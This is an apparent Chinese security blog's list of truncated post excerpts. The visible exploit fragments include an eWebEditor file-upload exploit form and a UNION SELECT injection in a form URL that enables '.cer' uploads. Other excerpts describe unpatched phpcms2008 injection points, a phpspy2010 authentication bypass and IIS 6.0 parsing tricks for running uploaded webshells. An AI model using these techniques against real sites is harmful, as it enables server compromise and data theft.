`
文章列表
刚提交wooyun,等到公开了,就放出来给大家。这个可是我自己挖的哦
这个是转自老外的,两个java文件,里面有说明,感觉危害没有想象中的那么大  
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_FILE_SIZE&qu ...
强制远程连接,超过最大连接数。mstsc /console /v:192.168.66.133:3389mstsc /v:192.168.66.133:3389 /console/admin

ewebeditor上传漏洞

<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br> <form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S_ID,S_Name,S_Dir,S_CSS,'UploadFile',S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b'|cer' ,S_Flas ...
import sys import getopt import os import re def replace(dir,regex): p = re.compile(regex) WalkDir(dir,p) def replacemore(dir,regex,regex2): p = re.compile(regex) p2 = re.compile(regex2) WalkDirmore(dir,p,p2) def WalkDir( dir, regex,dir_callback = None, file_cal ...

phpcms2008漏洞

下面是官方到目前为止还没有打补丁的几个漏洞 http://www.tmdsb.com/flash_upload.php?modelid=1 注入漏洞 <?php require dirname(__FILE__).'/include/common.inc.php'; if($PHPSESSID) { session_id($PHPSESSID); session_start(); } if($auth) set_cookie('auth', $auth); if(!get_cookie('cookietime') && $cookietime) ...
    phpspy2010可谓是webshell界很不错的一个工具,但是phpspy2010 和2011相继爆出了绕过认证漏洞,我简单分析下php2010的绕过漏洞,首先据说只有php2010的加密版才有这个漏洞,我大概看了下官方解释,估计也只有加密版才有这个问题,而且看上去应该是个失误。。。       下面具体分析:附件是2010的源代码,由于是加密的eval执行base64解密, 把eval改成echo就可以输出源代码了。 代码核心部分如下 $admin = array(); // 是否需要密码验证, true 为需要验证, false 为直接进入.下面选项则无效 $admi ...
    这个漏洞的危害非常严重,我目前看到的比较多的应用有几个  1 。 数据库备份上得使用,很多信息管理系统,cms,网城等等,在拿到了管理员账户后,需要上传木马时,很多地方都限制了asp或者asa的上传,这时采用上传一个a.jpg,然后在备份的时候备份为../a.asp/b.mdb,因为在很多情况下数据库备份都会做限制,不允许自定义备份后缀名,但是你可以自定义备份路径,从而构成a.asp这种目录从而触发iis6.0的解析漏洞。 2 。直接使用,即上传a.asp;.jpg这种有些时候是过不去的,但是如果限制不严是可以通过的,实际上文件名只要是a.asp;....分好后面可以自定义各种字符, ...
      最近在看到一篇帖子时候,发现竟然上传的是jpg木马,一时没有想通原理,iis服务器怎么可能把jpg文件当做asp文件执行呢,结果网上百度后发现,这时iis的一个长期漏洞,那么回头再看,很多网站的上传过滤就很有问题了,只过滤后缀名的话估计就会有问题      具体有两个大的解析漏洞   1   如果iis目录下面存在类似*.asp,*.asa之类的目录,那么该目录下面的所有文件将视为asp或者asa可以执行,而不管原始后缀名,比如说wwwroot//3.asp/1.jpg。构造这样的目录文件结构,其中1.jpg内容为 <%=NOW()%>   那么在自己的浏 ...
     上篇讲到了payload.xml,这篇就详细说下 payload.xml帮助 写道 <!-- Tag: <boundary> How to prepend and append to the test ' <payload><comment> ' string. Sub-tag: <level> From which level check for this test. Valid values: 1: Always (<100 requests) 2: Try a bit harder (100-200 requests ...
      sqlmap是一款开源的sql注入工具,比起国内的很多工具来说,他最大的优点就是开源,你可以根据自己的注入经验改造这一款软件,而且他提供注入的细节输出,比如注入所使用的sql,变形后的sql,request,response细节,并且支持几乎目前所有的常见数据库,及注入手段(get,post,cookie),而且对页面的抓取也比较给力,盲注什么的更不在话下。优点多多。对中国人来说问题只有两个。。。。           1.没有图形界面。。。           2. 英文的。。。。。         这是他的svn检出地址,如果要用sqlmap,强烈推荐svn检出后,自己修 ...
       学习开发python,由于3.x版本改动较大,现在大规模使用的应该还是2.x版本,但是由于GFW存在,python官网的download页面无法访问, 特提供官方的ftp页面,这个比较方便 http://www.python.org/ftp/python/ 下面这个是x86 32位的2.7.2 rc1直接下载地址: http://www.python.org/ftp/python/2.7.2/python-2.7.2rc1.msi   同样下面是ulipad,一个小巧的python ide,我个人非常喜欢,eclipse实在太大了。 http://ulipad.goo ...
   这两天在写一个sql,就是有A,B两个表,要利用b表的字段更新a表对应的字段。形如 update A set A.a=(select B.b from B where A.id=B.id);  这是一个非常常见的更新查询,但是在实际使用中,我要更新的a表和b表并不是主键相关,而是一个非唯一键相等,这样在实际中,观察执行计划发现根本不走索引,尽管我在A和B的相关字段上都添加了索引,甚至使用了 hint-/*+ index()*/ ,但是依然无效,在25w大小的数据量面前,两个全表查询连接完全无法接受。 update /*+  index(t INDEX_FLAG) */ t_ ...
      最近带了个实习生做了个sql注入练习,她找到了个asp网站的cooki注入漏洞,这个也是目前sql注入比较多见的地方,因为大部分网站在得到request的时候采用的都是request("xx"),这个方法实际上是把request中的get,post,cookie挨个遍历查询了下,目前大部分sql注入防御软件都封掉了get,post这两个漏洞,但是却对cookie视而不见。这个也是比较长时间的一个问题了。         sql注入诸如大家基本上都明确了,而且工具也是比较多,但是cookie注入方面工具就貌似不是很多了,像知名的Jsky不支持cookie注入, ...
Global site tag (gtag.js) - Google Analytics